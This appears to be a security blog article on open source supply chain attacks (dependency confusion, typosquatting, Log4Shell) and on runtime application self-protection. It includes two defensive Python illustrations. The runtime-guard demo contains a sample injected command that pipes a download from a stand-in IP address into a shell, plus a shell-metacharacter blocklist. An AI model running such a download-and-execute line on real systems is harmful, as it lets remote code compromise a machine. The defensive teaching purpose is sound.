Is Open Source Software Crippling the Software Supply Chain?
Open source has defined the modern tech stack. Behind the routine activities of every working day, and of every consumer, is the work of a generation of developers who chose to share their code. A number of high-profile vulnerabilities have cast doubt on what open source means for application security, throwing one question into the limelight: is open source code a threat to your attack surface?
Innovation Through Collaboration
Open source is everywhere. Strictly, though, the term describes more than lines of code: it names a family of licences under which a creator allows anyone to use, modify and redistribute the work, usually on condition that the licence terms travel with it. That can take many forms, whether improving on the foundational project or integrating it into a larger, more complex one, and it lets cutting-edge work resonate through an entire industry. In software development, removing these barriers between innovators is what makes the free exchange of ideas possible.
Open source has a long history, almost as old as software itself. As companies such as Microsoft and Apple picked up steam through the 1970s and 80s, freely shared software was established enough to be seen as a threat: Bill Gates' 1976 "Open Letter to Hobbyists" asked hobbyists to stop copying Microsoft's BASIC without paying for it. Sharing gained real momentum in the 1990s. The Linux kernel and the Python language both appeared in 1991, the Apache HTTP Server followed in 1995 (with the Apache Software Foundation formed in 1999) and spread web server know-how through the developing tech world, and the term "open source" itself was coined in 1998. GitHub (2008) later put collaborative development at the heart of its mission.
Open source code has conquered the world thanks to one simple fact: it's written by developers, for developers. The focus that open source collectively places on innovation, without licensing barriers, has made open source libraries the cornerstone on which many industry-defining web apps are built.
Most organizations rely on at least one web app, and at enterprise scale open source components are likely powering mission-critical parts of those apps. Sonatype's State of the Software Supply Chain report estimated that 2.2 trillion open source packages were downloaded in 2021 alone, pulled in to add functionality, improve performance and accelerate time to market.
Open Source Is a Live Target
Open source code, hosted in large online registries and pulled in by thousands of apps across millions of businesses, makes an exceedingly tempting target. Poisoning it is among the most reliable, and most profitable, ways of mounting a supply chain attack today. The two most common methods are dependency confusion and typosquatting. Both exploit the fact that package managers (pip, npm and their peers) resolve a name to a package and download and install it automatically, often running install-time scripts with the privileges of the developer or build system that requested it.
In a dependency confusion attack, the attacker targets a package name that an organization uses only internally, served from a private registry. They publish a package with the same name to the public registry, carrying malicious code (typically in an install hook) and a version number higher than anything the internal package has reached. A package manager configured to consult both registries and take the highest available version then installs the attacker's package in place of the internal one. Nothing was "tricked" into believing the newer version is safer; the resolver simply did what it was told. Typosquatting takes a different approach: the attacker publishes a malicious package under a name one character away from a popular one and waits for a developer, or a script, to mistype the dependency. Across hundreds of dependencies, a single typing mistake can install a backdoor.
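To make the two mechanisms concrete, here is a small model of package resolution, added for this article and not code from the original page or from any package manager. It mimics what happens when a resolver is pointed at both a private and a public index (the configuration pip produces with `--extra-index-url`): the naive resolver takes the highest version wherever it comes from, the scoped resolver ties internal names to the private index, and a Levenshtein check flags names that sit one edit away from a popular package before anything is installed. The index contents, package names and versions are constructed sample data.

```python
"""Model of the package-resolution behaviour that dependency confusion and
typosquatting abuse, beside the checks that close each hole.
Added illustration, not the article's code; index contents, package names
and versions below are constructed sample data, not real registry state."""

# Constructed sample registry state.
PRIVATE_INDEX = {"acme-billing": ["1.2.0", "1.3.0"], "acme-auth": ["0.9.1"]}
PUBLIC_INDEX = {
    "requests": ["2.31.0"],
    "acme-billing": ["99.0.0"],   # attacker re-publishes the internal name with a huge version
    "requets": ["2.31.0"],        # typosquat: one character dropped from "requests"
}
INTERNAL_NAMES = set(PRIVATE_INDEX)
POPULAR_NAMES = ["requests", "numpy", "urllib3", "flask"]


def version_key(version):
    """Turn '1.10.2' into (1, 10, 2) so versions compare numerically."""
    return tuple(int(part) for part in version.split("."))


def resolve_naive(name):
    """Resolver that consults both indexes and takes the highest version it sees.

    This is the behaviour dependency confusion relies on: nothing ties an
    internal name to the internal index, so 99.0.0 from the public index wins.
    """
    candidates = []
    for source, index in (("private", PRIVATE_INDEX), ("public", PUBLIC_INDEX)):
        for version in index.get(name, []):
            candidates.append((version_key(version), source, version))
    if not candidates:
        raise LookupError(f"{name}: not found in any index")
    _, source, version = max(candidates)
    return source, version


def resolve_scoped(name):
    """Hardened resolver: internal names are fetched only from the private
    index, whatever the public index advertises; all other names are public-only."""
    if name in INTERNAL_NAMES:
        source, index = "private", PRIVATE_INDEX
    else:
        source, index = "public", PUBLIC_INDEX
    versions = index.get(name)
    if not versions:
        raise LookupError(f"{name}: not found in the {source} index")
    return source, max(versions, key=version_key)


def edit_distance(a, b):
    """Levenshtein distance via the standard dynamic-programming table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_suspects(name, popular=POPULAR_NAMES, max_distance=1):
    """Popular names within max_distance edits of `name` (exact match excluded).

    A non-empty result means the requested name is a plausible typo of a
    well-known package and should be confirmed by a human before installing."""
    return [p for p in popular if p != name and edit_distance(name, p) <= max_distance]


def preinstall_check(name):
    """Gate a requested dependency: returns (source, version) or raises."""
    suspects = typosquat_suspects(name)
    if suspects:
        raise ValueError(f"{name!r} looks like a typo of {suspects}; refusing to install")
    return resolve_scoped(name)


if __name__ == "__main__":
    print("naive  :", resolve_naive("acme-billing"))    # attacker's 99.0.0 from public
    print("scoped :", resolve_scoped("acme-billing"))   # internal 1.3.0 from private
    print("typo?  :", typosquat_suspects("requets"))    # ['requests']
```

The scoped resolver is the policy that dependency confusion cannot get past: the decision of where a name may come from is made before versions are compared, so a larger public version number is never in the running. The typo check is deliberately conservative (distance one against a curated list); a real pre-install gate would also consult the registry's own package metadata and age.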
Researchers counted over 55,000 malicious packages uploaded to open source registries in the past year, most of them targeting the Python (PyPI) and Node.js (npm) ecosystems. Over the past three years the count rises to roughly 95,000, a 700% increase in these attacks over that period.
The effects of these apparently innocuous, malware-laden packages are felt mostly downstream, by the developers and software providers who consume them. Given the sheer volume, manual review of every dependency is all but impossible. In the most serious cases, a single flaw can poison a well that supplies millions. The Log4Shell vulnerability (CVE-2021-44228) is the textbook case. Apache Log4j, a logging library embedded in products as different as Minecraft, Apple iCloud and AWS services, was found to resolve JNDI lookups embedded in the strings it logged; an attacker who could get a crafted string such as a User-Agent header written to a log could make the application fetch and execute code from an attacker-controlled server. Log4Shell was not a poisoned package but an ordinary bug in a ubiquitous dependency; the lesson about blast radius is the same.
Unfortunately, Log4Shell is only one of many such cases: an estimated 24% of open source projects contain at least one known vulnerability. Here is how you can help shore up your organization's defenses against the growing threat of attacks through open source.
How to Secure Your Open Source Supply Chain
Before looking at a few key forms of open source security, it's worth noting that open source projects can be more secure than the average commercial code: the source is fully and freely available, so anyone, including qualified auditors, can examine it. The caveat is that openness only makes an audit possible; it does not guarantee that one happens, and Log4j's lookup feature sat in plain view for years before anyone reported the problem.
With that said, the possibility of a well-poisoning attack is ever-present in the complex and rapidly changing world of app development. Instead of waiting for an attack, your organization needs to secure the apps that support daily operations proactively. One of the most effective runtime protections is Runtime Application Self-Protection (RASP). A RASP agent instruments the application from the inside, giving visibility into the precise behaviors and permissions of the application itself: which files it opens, which commands it runs, which hosts it connects to. Once that baseline is established, user behavior and application traffic can be analyzed in context, which allows real-time detection of abnormal behavior, often the first sign of an attack in progress. When suspect activity is flagged, RASP can alert the security team to a potential weakness and block the activity itself. RASP is a runtime control; it complements, rather than replaces, build-time measures such as lockfiles, pinned versions, scoping internal package names to a private registry and software composition analysis.
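To show the mechanism rather than the marketing, here is a toy in-process guard in the spirit of RASP, written for this article and not taken from the original page or from any RASP product. It hooks one sensitive sink inside a Python application, `subprocess.Popen` (which `subprocess.run` and friends call through), compares every process launch with a declared baseline, and blocks and records anything outside it. The baseline (allowed binaries, no `shell=True`, no shell metacharacters in arguments) and the sample calls in `demo()` are constructed; a real agent would hook many more sinks and learn its baseline from observed behavior.

```python
"""Toy in-process guard illustrating the RASP idea: instrument a sensitive sink
inside the application, compare each call with a baseline, block and record
deviations. Added illustration, not the article's or any vendor's code.
The baseline and the sample calls in demo() are constructed."""
import shlex
import subprocess
import sys

# Characters that have no business inside an argument the app builds itself.
SHELL_METACHARS = set(";|&$`<>\n")


class RuntimeGuard:
    def __init__(self, allowed_binaries, alert=None):
        self.allowed = set(allowed_binaries)
        self.alert = alert or (lambda event: None)   # where a RASP agent would forward alerts
        self.events = []                              # record of blocked calls
        self._orig_popen = None

    def check(self, args, shell=False):
        """Return (ok, reason) for a proposed process launch.

        Baseline: shell=False, binary on the allowlist, no shell metacharacters
        in any argument (the tell-tale of an injected command)."""
        if shell:
            return False, "shell=True is outside the baseline"
        argv = list(args) if isinstance(args, (list, tuple)) else shlex.split(args)
        if not argv:
            return False, "empty command"
        if argv[0] not in self.allowed:
            return False, f"binary {argv[0]!r} not in baseline"
        for arg in argv[1:]:
            if SHELL_METACHARS & set(arg):
                return False, f"shell metacharacter in argument {arg!r}"
        return True, "ok"

    def install(self):
        """Replace subprocess.Popen with a checking subclass; run()/check_output() use it."""
        if self._orig_popen is not None:
            return
        self._orig_popen = subprocess.Popen
        guard = self

        class GuardedPopen(self._orig_popen):
            def __init__(self, args, *pargs, **kwargs):
                ok, reason = guard.check(args, shell=kwargs.get("shell", False))
                if not ok:
                    event = {"args": args, "reason": reason}
                    guard.events.append(event)
                    guard.alert(event)
                    raise PermissionError(f"blocked by runtime guard: {reason}")
                super().__init__(args, *pargs, **kwargs)

        subprocess.Popen = GuardedPopen

    def uninstall(self):
        if self._orig_popen is not None:
            subprocess.Popen = self._orig_popen
            self._orig_popen = None


def demo():
    """Run one baseline launch and one injected launch; return the blocked events."""
    guard = RuntimeGuard(allowed_binaries={sys.executable}, alert=print)
    guard.install()
    try:
        # Normal application behaviour: launches the interpreter with a benign snippet.
        subprocess.run([sys.executable, "-c", "print('hello')"], capture_output=True, check=True)
        # Attacker-controlled input reached the argument list: blocked before it spawns.
        try:
            subprocess.run([sys.executable, "-c",
                            "import os; os.system('curl http://203.0.113.7/x | sh')"])
        except PermissionError:
            pass
    finally:
        guard.uninstall()
    return guard.events


if __name__ == "__main__":
    for event in demo():
        print("blocked:", event["reason"])
```

The point of the example is where the check sits: inside the process, at the sink, with the real arguments in hand, which is what lets a RASP agent judge a call in context rather than pattern-match traffic at the edge. The same placement is also its limit; a guard like this only sees the sinks it hooks.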
RASP is only one of the next-generation security tools now defending an intensely fragmented supply chain. Keeping your organization, and its customers, safe is the primary goal of high-quality security solution providers.